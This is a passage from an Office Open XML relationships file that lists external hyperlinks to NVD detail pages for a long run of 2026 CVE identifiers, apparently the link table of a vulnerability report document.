Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28616" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28620" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28624" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28639" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28653" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28659" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28664" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28668" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45515" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45531" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49884" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49887" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49918" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49919" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49927" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55273" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55285" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55294" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5729" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58611" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58820" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58823" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58839" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58846" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58941" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69407" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69432" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69541" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69576" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69731" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70574" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 